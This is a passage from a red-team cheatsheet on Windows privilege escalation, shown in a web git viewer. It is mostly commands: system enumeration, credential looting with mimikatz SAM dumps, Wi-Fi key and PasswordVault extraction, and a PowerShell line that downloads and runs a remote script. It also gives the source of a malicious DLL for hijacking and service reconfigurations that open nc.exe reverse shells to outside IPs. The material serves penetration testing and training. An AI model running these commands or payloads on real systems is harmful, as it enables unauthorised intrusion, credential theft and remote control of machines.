daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

windows-privilege-escalation.md (75989B)


      1 ---
      2 title: "Windows - Privilege Escalation"
      3 section: "Red Team"
      4 sectionSlug: "redteam"
      5 sourcePath: "docs/redteam/escalation/windows-privilege-escalation.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/escalation/windows-privilege-escalation.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Windows - Privilege Escalation
     12 
     13 ## Summary
     14 
     15 * [Tools](#tools)
     16 * [Windows Version and Configuration](#windows-version-and-configuration)
     17 * [User Enumeration](#user-enumeration)
     18 * [Network Enumeration](#network-enumeration)
     19 * [Antivirus Enumeration](#antivirus-enumeration)
     20 * [Default Writable Folders](#default-writable-folders)
     21 * [EoP - Looting for passwords](#eop---looting-for-passwords)
     22     * [SAM and SYSTEM files](#sam-and-system-files)
     23     * [HiveNightmare](#hivenightmare)
     24     * [LAPS Settings](#laps-settings)
     25     * [Search for file contents](#search-for-file-contents)
     26     * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
     27     * [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
     28     * [Passwords in unattend.xml](#passwords-in-unattendxml)
     29     * [Wifi passwords](#wifi-passwords)
     30     * [Sticky Notes passwords](#sticky-notes-passwords)
     31     * [Passwords stored in services](#passwords-stored-in-services)
     32     * [Passwords stored in Key Manager](#passwords-stored-in-key-manager)
     33     * [Passwords stored in UWP PasswordVault](#passwords-stored-in-uwp-passwordvault)
     34     * [Powershell History](#powershell-history)
     35     * [Powershell Transcript](#powershell-transcript)
     36     * [Password in Alternate Data Stream](#password-in-alternate-data-stream)
     37 * [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks)
     38 * [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
     39 * [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl)
     40 * [EoP - Unquoted Service Paths](#eop---unquoted-service-paths)
     41 * [EoP - $PATH Interception](#eop---path-interception)
     42 * [EoP - Named Pipes](#eop---named-pipes)
     43 * [EoP - Kernel Exploitation](#eop---kernel-exploitation)
     44 * [EoP - Microsoft Windows Installer](#eop---microsoft-windows-installer)
     45     * [AlwaysInstallElevated](#alwaysinstallelevated)
     46     * [CustomActions](#customactions)
     47 * [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
     48 * [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers)
     49 * [EoP - Printers](#eop---printers)
     50     * [Universal Printer](#universal-printer)
     51     * [Bring Your Own Vulnerability](#bring-your-own-vulnerability)
     52 * [EoP - Runas](#eop---runas)
     53 * [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies)
     54 * [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system)
     55 * [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts)
     56 * [EoP - Impersonation Privileges](#eop---impersonation-privileges)
     57     * [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges)
     58     * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
     59     * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
     60     * [Juicy Potato (Abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
     61     * [Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver))
     62     * [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw))
     63     * [PrintSpoofer (Printer Bug)](#printspoofer-printer-bug)))
     64 * [EoP - Privileged File Write](#eop---privileged-file-write)
     65     * [DiagHub](#diaghub)
     66     * [UsoDLLLoader](#usodllloader)
     67     * [WerTrigger](#wertrigger)
     68     * [WerMgr](#wermgr)
     69 * [EoP - Privileged File Delete](#eop---privileged-file-delete)
     70 * [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure)
     71     * [MS08-067 (NetAPI)](#ms08-067-netapi)
     72     * [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt200020032008xpvista7)
     73     * [MS11-080 (adf.sys)](#ms11-080-afdsys---microsoft-windows-xp2003)
     74     * [MS15-051 (Client Copy Image)](#ms15-051-client-copy-image---microsoft-windows-20032008782012)
     75     * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
     76     * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
     77     * [CVE-2019-1388](#cve-2019-1388)
     78 * [EoP - $PATH Interception](#eop---path-interception)
     79 * [References](#references)
     80 
     81 ## Tools
     82 
     83 * [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit)
     84 
     85     ```powershell
     86     powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
     87     ```
     88 
     89 * [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
     90 * [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
     91 
     92     ```powershell
     93     powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1
     94     ```
     95 
     96 * [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
     97 * [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
     98 
     99     ```powershell
    100     ./windows-exploit-suggester.py --update
    101     ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt 
    102     ```
    103 
    104 * [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check)
    105 * [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits)
    106 * [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum)
    107 * [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt)
    108 
    109     ```powershell
    110     Seatbelt.exe -group=all -full
    111     Seatbelt.exe -group=system -outputfile="C:\Temp\system.txt"
    112     Seatbelt.exe -group=remote -computername=dc.theshire.local -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\""
    113     ```
    114 
    115 * [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless)
    116 * [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS)
    117 
    118     ```powershell
    119     powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
    120     ```
    121 
    122 * [winPEAS - Windows Privilege Escalation Awesome Script](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe)
    123 * [Windows Exploit Suggester - Next Generation (WES-NG)](https://github.com/bitsadmin/wesng)
    124 
    125     ```powershell
    126     # First obtain systeminfo
    127     systeminfo
    128     systeminfo > systeminfo.txt
    129     # Then feed it to wesng
    130     python3 wes.py --update-wes
    131     python3 wes.py --update
    132     python3 wes.py systeminfo.txt
    133     ```
    134 
    135 * [PrivescCheck - Privilege Escalation Enumeration Script for Windows](https://github.com/itm4n/PrivescCheck)
    136 
    137     ```powershell
    138     C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
    139     C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
    140     C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Report PrivescCheck_%COMPUTERNAME% -Format TXT,CSV,HTML"
    141     ```
    142 
    143 ## Windows Version and Configuration
    144 
    145 ```powershell
    146 systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
    147 ```
    148 
    149 Extract patchs and updates
    150 
    151 ```powershell
    152 wmic qfe
    153 ```
    154 
    155 Architecture
    156 
    157 ```powershell
    158 wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
    159 ```
    160 
    161 List all env variables
    162 
    163 ```powershell
    164 set
    165 Get-ChildItem Env: | ft Key,Value
    166 ```
    167 
    168 List all drives
    169 
    170 ```powershell
    171 wmic logicaldisk get caption || fsutil fsinfo drives
    172 wmic logicaldisk get caption,description,providername
    173 Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
    174 ```
    175 
    176 ## User Enumeration
    177 
    178 Get current username
    179 
    180 ```powershell
    181 echo %USERNAME% || whoami
    182 $env:username
    183 ```
    184 
    185 List user privilege
    186 
    187 ```powershell
    188 whoami /priv
    189 whoami /groups
    190 ```
    191 
    192 List all users
    193 
    194 ```powershell
    195 net user
    196 whoami /all
    197 Get-LocalUser | ft Name,Enabled,LastLogon
    198 Get-ChildItem C:\Users -Force | select Name
    199 ```
    200 
    201 List logon requirements; useable for bruteforcing
    202 
    203 ```powershell
    204 $env:usernadsc
    205 net accounts
    206 ```
    207 
    208 Get details about a user (i.e. administrator, admin, current user)
    209 
    210 ```powershell
    211 net user administrator
    212 net user admin
    213 net user %USERNAME%
    214 ```
    215 
    216 List all local groups
    217 
    218 ```powershell
    219 net localgroup
    220 Get-LocalGroup | ft Name
    221 ```
    222 
    223 Get details about a group (i.e. administrators)
    224 
    225 ```powershell
    226 net localgroup administrators
    227 Get-LocalGroupMember Administrators | ft Name, PrincipalSource
    228 Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
    229 ```
    230 
    231 Get Domain Controllers
    232 
    233 ```powershell
    234 nltest /DCLIST:DomainName
    235 nltest /DCNAME:DomainName
    236 nltest /DSGETDC:DomainName
    237 ```
    238 
    239 ## Network Enumeration
    240 
    241 List all network interfaces, IP, and DNS.
    242 
    243 ```powershell
    244 ipconfig /all
    245 Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
    246 Get-DnsClientServerAddress -AddressFamily IPv4 | ft
    247 ```
    248 
    249 List current routing table
    250 
    251 ```powershell
    252 route print
    253 Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
    254 ```
    255 
    256 List the ARP table
    257 
    258 ```powershell
    259 arp -A
    260 Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
    261 ```
    262 
    263 List all current connections
    264 
    265 ```powershell
    266 netstat -ano
    267 ```
    268 
    269 List all network shares
    270 
    271 ```powershell
    272 net share
    273 powershell Find-DomainShare -ComputerDomain domain.local
    274 ```
    275 
    276 SNMP Configuration
    277 
    278 ```powershell
    279 reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
    280 Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
    281 ```
    282 
    283 ## Antivirus Enumeration
    284 
    285 Enumerate antivirus on a box with `WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName`
    286 
    287 ## Default Writable Folders
    288 
    289 ```powershell
    290 C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
    291 C:\Windows\System32\spool\drivers\color
    292 C:\Windows\System32\spool\printers
    293 C:\Windows\System32\spool\servers
    294 C:\Windows\tracing
    295 C:\Windows\Temp
    296 C:\Users\Public
    297 C:\Windows\Tasks
    298 C:\Windows\System32\tasks
    299 C:\Windows\SysWOW64\tasks
    300 C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system
    301 C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system
    302 C:\Windows\debug\wia
    303 C:\Windows\registration\crmlog
    304 C:\Windows\System32\com\dmp
    305 C:\Windows\SysWOW64\com\dmp
    306 C:\Windows\System32\fxstmp
    307 C:\Windows\SysWOW64\fxstmp
    308 ```
    309 
    310 ## EoP - Looting for passwords
    311 
    312 ### SAM and SYSTEM files
    313 
    314 The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.
    315 
    316 ```powershell
    317 # Usually %SYSTEMROOT% = C:\Windows
    318 %SYSTEMROOT%\repair\SAM
    319 %SYSTEMROOT%\System32\config\RegBack\SAM
    320 %SYSTEMROOT%\System32\config\SAM
    321 %SYSTEMROOT%\repair\system
    322 %SYSTEMROOT%\System32\config\SYSTEM
    323 %SYSTEMROOT%\System32\config\RegBack\system
    324 ```
    325 
    326 Generate a hash file for John using `pwdump` or `samdump2`.
    327 
    328 ```powershell
    329 pwdump SYSTEM SAM > /root/sam.txt
    330 samdump2 SYSTEM SAM -o sam.txt
    331 ```
    332 
    333 Either crack it with `john -format=NT /root/sam.txt`, [hashcat](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md#hashcat) or use Pass-The-Hash.
    334 
    335 ### HiveNightmare
    336 
    337 > CVE-2021–36934 allows you to retrieve all registry hives (SAM,SECURITY,SYSTEM) in Windows 10 and 11 as a non-administrator user
    338 
    339 Check for the vulnerability using `icacls`
    340 
    341 ```powershell
    342 C:\Windows\System32> icacls config\SAM
    343 config\SAM BUILTIN\Administrators:(I)(F)
    344            NT AUTHORITY\SYSTEM:(I)(F)
    345            BUILTIN\Users:(I)(RX)    <-- this is wrong - regular users should not have read access!
    346 ```
    347 
    348 Then exploit the CVE by requesting the shadowcopies on the filesystem and reading the hives from it.
    349 
    350 ```powershell
    351 mimikatz> token::whoami /full
    352 
    353 # List shadow copies available
    354 mimikatz> misc::shadowcopies
    355 
    356 # Extract account from SAM databases
    357 mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
    358 
    359 # Extract secrets from SECURITY
    360 mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
    361 ```
    362 
    363 ### LAPS Settings
    364 
    365 Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry.
    366 
    367 * LAPS Enabled: AdmPwdEnabled
    368 * LAPS Admin Account Name: AdminAccountName
    369 * LAPS Password Complexity: PasswordComplexity
    370 * LAPS Password Length: PasswordLength
    371 * LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
    372 
    373 ### Search for file contents
    374 
    375 ```powershell
    376 cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
    377 findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
    378 findstr /spin "password" *.*
    379 ```
    380 
    381 Also search in remote places such as SMB Shares and SharePoint:
    382 
    383 * Search passwords in SharePoint: [nheiniger/SnaffPoint](https://github.com/nheiniger/SnaffPoint) (must be compiled first, for referencing issue see: [Pull #6](https://github.com/nheiniger/SnaffPoint/pull/6))
    384 
    385 ```powershell
    386 # First, retrieve a token
    387 ## Method 1: using SnaffPoint binary
    388 $token = (.\GetBearerToken.exe https://your.sharepoint.com)
    389 ## Method 2: using AADInternals
    390 Install-Module AADInternals -Scope CurrentUser
    391 Import-Module AADInternals
    392 $token = (Get-AADIntAccessToken -ClientId "9bc3ab49-b65d-410a-85ad-de819febfddc" -Tenant "your.onmicrosoft.com" -Resource "https://your.sharepoint.com")
    393 
    394 # Second, search on Sharepoint
    395 ## Method 1: using search strings in ./presets dir
    396 .\SnaffPoint.exe -u "https://your.sharepoint.com" -t $token
    397 ## Method 2: using search string in command line
    398 ### -l uses FQL search, see: https://learn.microsoft.com/en-us/sharepoint/dev/general-development/fast-query-language-fql-syntax-reference
    399 .\SnaffPoint.exe -u "https://your.sharepoint.com" -t $token -l -q "filename:.config"
    400 ```
    401 
    402 * Search passwords in SMB Shares: [SnaffCon/Snaffler](https://github.com/SnaffCon/Snaffler)
    403 
    404 ### Search for a file with a certain filename
    405 
    406 ```powershell
    407 dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
    408 where /R C:\ user.txt
    409 where /R C:\ *.ini
    410 ```
    411 
    412 ### Search the registry for key names and passwords
    413 
    414 ```powershell
    415 REG QUERY HKLM /F "password" /t REG_SZ /S /K
    416 REG QUERY HKCU /F "password" /t REG_SZ /S /K
    417 
    418 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
    419 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 
    420 reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
    421 reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
    422 reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
    423 reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
    424 
    425 reg query HKLM /f password /t REG_SZ /s
    426 reg query HKCU /f password /t REG_SZ /s
    427 ```
    428 
    429 ### Passwords in unattend.xml
    430 
    431 Location of the unattend.xml files.
    432 
    433 ```powershell
    434 C:\unattend.xml
    435 C:\Windows\Panther\Unattend.xml
    436 C:\Windows\Panther\Unattend\Unattend.xml
    437 C:\Windows\system32\sysprep.inf
    438 C:\Windows\system32\sysprep\sysprep.xml
    439 ```
    440 
    441 Display the content of these files with `dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul`.
    442 
    443 Example content
    444 
    445 ```powershell
    446 <component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
    447     <AutoLogon>
    448      <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
    449      <Enabled>true</Enabled>
    450      <Username>Administrateur</Username>
    451     </AutoLogon>
    452 
    453     <UserAccounts>
    454      <LocalAccounts>
    455       <LocalAccount wcm:action="add">
    456        <Password>*SENSITIVE*DATA*DELETED*</Password>
    457        <Group>administrators;users</Group>
    458        <Name>Administrateur</Name>
    459       </LocalAccount>
    460      </LocalAccounts>
    461     </UserAccounts>
    462 ```
    463 
    464 Unattend credentials are stored in base64 and can be decoded manually with base64.
    465 
    466 ```powershell
    467 $ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo="  | base64 -d 
    468 SecretSecurePassword1234*
    469 ```
    470 
    471 The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
    472 
    473 ### IIS Web config
    474 
    475 ```powershell
    476 Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
    477 ```
    478 
    479 ```powershell
    480 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
    481 C:\inetpub\wwwroot\web.config
    482 ```
    483 
    484 ### Other files
    485 
    486 ```bat
    487 %SYSTEMDRIVE%\pagefile.sys
    488 %WINDIR%\debug\NetSetup.log
    489 %WINDIR%\repair\sam
    490 %WINDIR%\repair\system
    491 %WINDIR%\repair\software, %WINDIR%\repair\security
    492 %WINDIR%\iis6.log
    493 %WINDIR%\system32\config\AppEvent.Evt
    494 %WINDIR%\system32\config\SecEvent.Evt
    495 %WINDIR%\system32\config\default.sav
    496 %WINDIR%\system32\config\security.sav
    497 %WINDIR%\system32\config\software.sav
    498 %WINDIR%\system32\config\system.sav
    499 %WINDIR%\system32\CCM\logs\*.log
    500 %USERPROFILE%\ntuser.dat
    501 %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
    502 %WINDIR%\System32\drivers\etc\hosts
    503 C:\ProgramData\Configs\*
    504 C:\Program Files\Windows PowerShell\*
    505 dir c:*vnc.ini /s /b
    506 dir c:*ultravnc.ini /s /b
    507 ```
    508 
    509 ### Wifi passwords
    510 
    511 Find AP SSID
    512 
    513 ```bat
    514 netsh wlan show profile
    515 ```
    516 
    517 Get Cleartext Pass
    518 
    519 ```bat
    520 netsh wlan show profile <SSID> key=clear
    521 ```
    522 
    523 Oneliner method to extract wifi passwords from all the access point.
    524 
    525 ```batch
    526 cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
    527 ```
    528 
    529 ### Sticky Notes passwords
    530 
    531 The sticky notes app stores it's content in a sqlite db located at `C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite`
    532 
    533 ### Passwords stored in services
    534 
    535 Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher)
    536 
    537 ```powershell
    538 https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
    539 Import-Module path\to\SessionGopher.ps1;
    540 Invoke-SessionGopher -AllDomain -o
    541 Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
    542 ```
    543 
    544 ### Passwords stored in Key Manager
    545 
    546 :warning: This software will display its output in a GUI
    547 
    548 ```ps1
    549 rundll32 keymgr,KRShowKeyMgr
    550 ```
    551 
    552 ### Passwords stored in UWP PasswordVault
    553 
    554 Modern Windows UWP applications, Microsoft Edge, and modern system services store authentication tokens and plaintext passwords inside the Universal Windows Platform (UWP) `PasswordVault` (also exposed as `Web Credentials` in `vaultcmd`). This storage space is session-isolated and can be decrypted natively without administrative or `SeDebugPrivilege` rights.
    555 
    556 Execute this PowerShell command inside the user's active session to instantly dump and decrypt all stored usernames and plaintext passwords:
    557 
    558 ```ps1
    559 [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]; $v = New-Object Windows.Security.Credentials.PasswordVault; $v.RetrieveAll() | ForEach-Object { try { $_.RetrievePassword(); $_ } catch {} } | Select-Object Resource, UserName, Password | Format-List
    560 ```
    561 
    562 ### Powershell History
    563 
    564 Disable Powershell history: `Set-PSReadlineOption -HistorySaveStyle SaveNothing`.
    565 
    566 ```powershell
    567 type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
    568 type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
    569 type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    570 cat (Get-PSReadlineOption).HistorySavePath
    571 cat (Get-PSReadlineOption).HistorySavePath | sls passw
    572 ```
    573 
    574 ### Powershell Transcript
    575 
    576 ```xml
    577 C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
    578 C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
    579 ```
    580 
    581 ### Password in Alternate Data Stream
    582 
    583 ```ps1
    584 PS > Get-Item -path flag.txt -Stream *
    585 PS > Get-Content -path flag.txt -Stream Flag
    586 ```
    587 
    588 ## EoP - Processes Enumeration and Tasks
    589 
    590 * What processes are running?
    591 
    592     ```powershell
    593     tasklist /v
    594     net start
    595     sc query
    596     Get-Service
    597     Get-Process
    598     Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
    599     ```
    600 
    601 * Which processes are running as "system"
    602 
    603     ```powershell
    604     tasklist /v /fi "username eq system"
    605     ```
    606 
    607 * Do you have powershell magic?
    608 
    609     ```powershell
    610     REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
    611     ```
    612 
    613 * List installed programs
    614 
    615     ```powershell
    616     Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
    617     Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
    618     ```
    619 
    620 * List services
    621 
    622     ```powershell
    623     net start
    624     wmic service list brief
    625     tasklist /SVC
    626     ```
    627 
    628 * Enumerate scheduled tasks
    629 
    630     ```powershell
    631     schtasks /query /fo LIST 2>nul | findstr TaskName
    632     schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
    633     Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
    634     ```
    635 
    636 * Startup tasks
    637 
    638     ```powershell
    639     wmic startup get caption,command
    640     reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
    641     reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    642     reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
    643     dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
    644     dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
    645     ```
    646 
    647 ## EoP - Incorrect permissions in services
    648 
    649 > A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system.
    650 
    651 Often, services are pointing to writable locations:
    652 
    653 * Orphaned installs, not installed anymore but still exist in startup
    654 * DLL Hijacking
    655 
    656     ```powershell
    657     # find missing DLL 
    658     - Find-PathDLLHijack PowerUp.ps1
    659     - Process Monitor : check for "Name Not Found"
    660 
    661     # compile a malicious dll
    662     - For x64 compile with: "x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
    663     - For x86 compile with: "i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
    664 
    665     # content of windows_dll.c
    666     #include <windows.h>
    667     BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    668         if (dwReason == DLL_PROCESS_ATTACH) {
    669             system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
    670             ExitProcess(0);
    671         }
    672         return TRUE;
    673     }
    674     ```
    675 
    676 * PATH directories with weak permissions
    677 
    678     ```powershell
    679     $ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
    680     $ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
    681 
    682     $ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
    683     FOR /F %i in (Servicenames.txt) DO echo %i
    684     type Servicenames.txt
    685     FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
    686     FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
    687     ```
    688 
    689 Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions`
    690 
    691 Note to check file permissions you can use `cacls` and `icacls`
    692 > icacls (Windows Vista +)
    693 > cacls (Windows XP)
    694 
    695 You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify access) or  `BUILTIN\Users:(W)`(Write-only access) in the output.
    696 
    697 ### Example with Windows 10 - CVE-2019-1322 UsoSvc
    698 
    699 Prerequisite: Service account
    700 
    701 ```powershell
    702 PS C:\Windows\system32> sc.exe stop UsoSvc
    703 PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"
    704 PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"
    705 PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd /C C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
    706 PS C:\Windows\system32> sc.exe qc usosvc
    707 [SC] QueryServiceConfig SUCCESS
    708 
    709 SERVICE_NAME: usosvc
    710         TYPE               : 20  WIN32_SHARE_PROCESS 
    711         START_TYPE         : 2   AUTO_START  (DELAYED)
    712         ERROR_CONTROL      : 1   NORMAL
    713         BINARY_PATH_NAME   : C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe
    714         LOAD_ORDER_GROUP   : 
    715         TAG                : 0
    716         DISPLAY_NAME       : Update Orchestrator Service
    717         DEPENDENCIES       : rpcss
    718         SERVICE_START_NAME : LocalSystem
    719 
    720 PS C:\Windows\system32> sc.exe start UsoSvc
    721 ```
    722 
    723 ### Example with Windows XP SP1 - upnphost
    724 
    725 ```powershell
    726 # NOTE: spaces are mandatory for this exploit to work !
    727 sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe"
    728 sc config upnphost obj= ".\LocalSystem" password= ""
    729 sc qc upnphost
    730 sc config upnphost depend= ""
    731 net start upnphost
    732 ```
    733 
    734 If it fails because of a missing dependency, try the following commands.
    735 
    736 ```powershell
    737 sc config SSDPSRV start=auto
    738 net start SSDPSRV
    739 net stop upnphost
    740 net start upnphost
    741 
    742 sc config upnphost depend=""
